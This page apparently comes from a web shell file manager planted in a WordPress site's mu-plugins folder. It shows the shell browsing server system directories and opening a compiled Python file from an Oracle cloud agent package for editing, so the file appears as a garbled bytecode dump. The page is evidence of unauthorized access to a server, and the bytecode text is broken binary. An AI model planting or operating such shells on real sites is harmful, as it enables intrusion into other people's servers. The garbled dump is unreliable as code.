📂 Advanced File Manager
Multi-Root Navigation System
⚡ Quick Jump
Server (/)
Home (/home)
Var_www (/var/www)
Current (/home4/shelley/public_html/shelleycutler.com/wp-content/mu-plugins)
📍 Go
⬆ Ke Atas
🏠 Root Server
🏠 Root App
🔄 Refresh
📀 /
›
usr
›
libexec
›
oracle-cloud-agent
›
plugins
›
osms
›
oci
›
optimizer
›
📁 models
📍
Lokasi:
/usr/libexec/oracle-cloud-agent/plugins/osms/oci/optimizer/models
💾
Free:
45.8 GB
⚠️ Direktori ini
tidak writable
.
✏️ Mengedit: enrollment_status_summary.pyc
a O��f�+ � @ s8 d dl mZmZmZ d dlmZ eG dd� de��ZdS )� )�formatted_flat_dict� NONE_SENTINEL�#value_allowed_none_or_none_sentinel)�init_model_state_from_kwargsc @ s e Zd ZdZdZdZdZdZdZdZ dZ d Zd ZdZ dZdd� Zed d� �Zejdd� �Zedd� �Zejdd� �Zedd� �Zejdd� �Zedd� �Zejdd� �Zedd� �Zejdd� �Zedd� �Zejdd� �Zedd � �Zejd!d � �Zd"d#� Zd$d%� Zd&d'� Zd(S ))�EnrollmentStatusSummaryzE The metadata associated with the enrollment status summary. �ACTIVE�FAILED�INACTIVE� ATTACHING� DETACHING�DELETING�DELETED�UPDATING�CREATINGc K sZ dddddddd�| _ dddddd d d�| _d| _d| _d| _d| _d| _d| _d| _dS )a� Initializes a new EnrollmentStatusSummary object with values from keyword arguments. The following keyword arguments are supported (corresponding to the getters/setters of this class): :param id: The value to assign to the id property of this EnrollmentStatusSummary. :type id: str :param compartment_id: The value to assign to the compartment_id property of this EnrollmentStatusSummary. :type compartment_id: str :param lifecycle_state: The value to assign to the lifecycle_state property of this EnrollmentStatusSummary. Allowed values for this property are: "ACTIVE", "FAILED", "INACTIVE", "ATTACHING", "DETACHING", "DELETING", "DELETED", "UPDATING", "CREATING", 'UNKNOWN_ENUM_VALUE'. Any unrecognized values returned by a service will be mapped to 'UNKNOWN_ENUM_VALUE'. :type lifecycle_state: str :param status: The value to assign to the status property of this EnrollmentStatusSummary. Allowed values for this property are: "ACTIVE", "INACTIVE", 'UNKNOWN_ENUM_VALUE'. Any unrecognized values returned by a service will be mapped to 'UNKNOWN_ENUM_VALUE'. :type status: str :param status_reason: The value to assign to the status_reason property of this EnrollmentStatusSummary. :type status_reason: str :param time_created: The value to assign to the time_created property of this EnrollmentStatusSummary. :type time_created: datetime :param time_updated: The value to assign to the time_updated property of this EnrollmentStatusSummary. :type time_updated: datetime �str�datetime)�id�compartment_id�lifecycle_state�status� status_reason�time_created�time_updatedr � compartmentId�lifecycleStater �statusReason�timeCreated�timeUpdatedN) � swagger_types� attribute_map�_id�_compartment_id�_lifecycle_state�_status�_status_reason� _time_created� _time_updated)�self�kwargs� r) ��/sparta/input/_build_configuration/image_build+validate/lib/bmcenv/lib64/python3.9/site-packages/oci/optimizer/models/enrollment_status_summary.py�__init__<